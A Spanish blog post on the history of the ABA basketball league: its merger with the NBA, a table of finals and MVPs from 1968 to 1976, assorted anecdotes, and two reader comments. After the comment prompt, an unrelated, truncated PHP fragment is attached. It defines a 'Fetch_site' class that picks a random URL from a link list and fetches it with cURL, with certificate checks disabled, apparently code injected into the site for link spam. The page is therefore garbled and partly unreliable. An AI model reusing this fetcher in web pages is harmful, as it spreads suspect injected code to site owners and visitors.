ABA: Historia del hermano menor de la NBA (y II)

03 de March de 2010 por Sergio
Artículo 6 de 9 de la serie Historia de la NBA

Hasta 32 equipos diferentes disputaron la competición a lo largo de su corta pero apasionante periplo pero tras la fusión con la NBA solo 4 equipos pasaron a formar parte de ella. San Antonio Spurs, Indiana Pacers, New York Nets (posteriormente llamados New Jersey), Denver Rockets/Nuggets, Spirits of St.Louis, Kentucky Colonels y Virginia Squires trataron de adhesionarse al campeonato. Sin embargo sólo los cuatro primeros fueron admitidos. Los propietarios de Spirits y Colonels fueron indemnizados millonariamente con parte de los derechos televisivos de los otros 4 equipos aceptados en compensación por el rechazo mostrado por la NBA. Los Virginia Squires, sin embargo, no consiguieron entrar en el corte final pues el equipo desapareció un tiempo antes de la decisión final. A pesar de ser admitidos en la NBA, equipos como los Nets se vieron obligados a vender a sus jugadores estrella (Julius Erving pasó a Philadelphia) debido a las mayores exigencias económicas que debían afrontar las nuevas franquicias al entrar en la antigua competición y a algunas indemnizaciones a otros equipos. Por ejemplo, los Nets se vieron obligados a pagar medio millón de dolares a los Knicks en base a la usurpación de mercado que realizaban los Nets, enclavados en la misma localidad que estos. De los equipos que lograron ser incluidos, tan solo los San Antonio Spurs han conseguido conquistar el anillo desde entonces.

Uno de los hechos más recordados de la ABA fue la disputa del concurso de mates en el que participaron Julius Erving y David Thompson. Este último fue el primer jugador en realizar un mate de 360º aunque desde luego no le valió el premio final puesto que Julius Erving realizó, gracias a su legendario físico, uno de los mates más rememorados de la historia. Aquel famoso mate desde el tiro libre que jugadores posteriores imitaron, Jordan entre ellos.

Los campeones, sus finalistas y los MVP durante aquellos años de ABA fueron:

Año Campeón Finalista Resultado MVP

1967-1968 Pittsburgh Pipers N.Orleans Buccaneers 4-3 Connie Hawkins

1968-1969 Oakland Oaks Indiana Pacers 4-1 Warren Jabali

1969-1970 Indiana Pacers Los Angeles Stars 4-2 Roger Brown

1970-1971 Utah Stars Kentucky Colonels 4-3 Zelmo Beaty

1971-1972 Indiana Pacers New York Nets 4-2 Freddie Lewis

1972-1973 Indiana Pacers Kentucky Colonels 4-3 George McGinnis

1973-1974 New York Nets Utah Stars 4-1 Julius Erving

1974-1975 Kentucky Colonels Indiana Pacers 4-1 Artis Gilmore

1975-1976 New York Nets Denver Nuggets 4-2 Julius Erving

Curiosidades

– De los 84 jugadores que comenzaron la última temporada de la ABA, 63 acabaron siendo incluidos en el draft de expansión realizado por la NBA.

– A pesar de que se lograron vender 30 millones de balones tricolor en los Estados Unidos, la liga no consiguió ganar ni un solo dólar puesto que nunca llegaron a registrar la marca del legendario balón.

– El partido inaugural de la ABA tuvo lugar el 13 de Octubre de 1967, enfrentando a Oakland Oaks contra los Anaheim Amigos en el Oakland Coliseum. El resultado final fue de 132-129 a favor de los Oaks.

– En dos años consecutivos (1970 y 1971), el equipo de los Pittsburgh Pipers transladó su base de operaciones a Minnesotta y de nuevo a Pittsburgh.

– La ABA consiguió un record acumulado de 79-76 en partidos disputados contra las franquicias de la NBA. En una parte se jugaba con las reglas NBA y en otras con las de la extinta liga.

– Rick Barry es el único jugador que fue capaz de liderar ambos campeonatos en anotación.

– Tan solo Denver, Indiana y Kentucky empezaron y terminaron la liga en la misma ciudad sin realizar translados.

– Durante el último partido como local en una de las temporadas de Indiana, se realizó un espectaculo en el que un oso boxeador realizó diversos combates contra luchadores profesionales y aficionados. La escena ha sido posteriormente reflejada en la película Semi Pro, la cual recomiendo para saber algo más de esta competición.

– Durante las finales de 1975, Indiana contrató a Harry el bailarín creyendo que podría actuar para animar a los jugadores y conseguir el partido. Finalmente así ocurrió, y el equipo rival, Denver, contraatacó con la bruja Robota, una suerte de Aramis Fuster que aparece en algunas fotos tras el banquillo de Denver intentando interferir con su “magia” en la concentración de los jugadores. Sin embargo, Denver no tuvo tanta suerte…

– El dueño real de los Kentucky Colonels era un perro llamado Ziggy, propiedad de los que se creía dueños de la entidad, el matrimonio Joe y Marie Gregory. Tenía asiento reservado, uniformes oficiales y viajaba a todos los partidos que el equipo disputaba fuera.

– Un jugador de los Pittsburgh Condors, el señor Brisker, se había comprometido a liderar la liga en anotación o, si no podía hacerlo, pelearse con todos sus defensores. Cumplió esta última promesa en un encuentro contra los Utah Stars, donde tuvo problemas con casi todo el equipo. En la revancha disputada en Utah, los Stars contrataron a 5 de los mejores boxeadores de la zona para ubicarse en las lineas de banda para intervenir si llegara a ser necesario. Esa fue la única vez que el jugador no buscó problemas durante un encuentro.

– En el año 1999 se produjó el renacimiento de una nueva competición llamada ABA (en un principio, y hasta conseguir los derechos, fue conocida como ABA 2000) que actualmente perdura. Uno de sus MVP’s tanto de la liga regular como de los Playoffs fue Pete Mickeal, antiguo jugador de TAU y actual jugador del Barcelona.

Para terminar, mencionar que no podemos olvidar que gran parte del juego original viene de esta anterior competición. Muchas de las innovaciones fueron implementadas con el tiempo en la competición resultante. Cada vez que vemos un partido de la NBA deberíamos acordarnos de lo mucho que debemos a esta extinta liga.

Comenta

2 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Vaya pedazo de artículo, Sergio
    Tenía su encanto, pero como reflejan todas esas hilarantes anécdotas era una liga demasiado bizarra como para prosperar.

    Con lo que más he alucinado (y ya es) ha sido con lo de no tener los derechos del balón tricolor. Para mear y no echar gota.

      Citar

  2. Txusma dice:
    #2

    Supongo que antes estas cosas del marketing y el mercado no se tenían tan en cuenta. Ahora, antes de empezar cualquier cosa has de registrarlo y patentarlo todo, por lo que pueda pasar.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>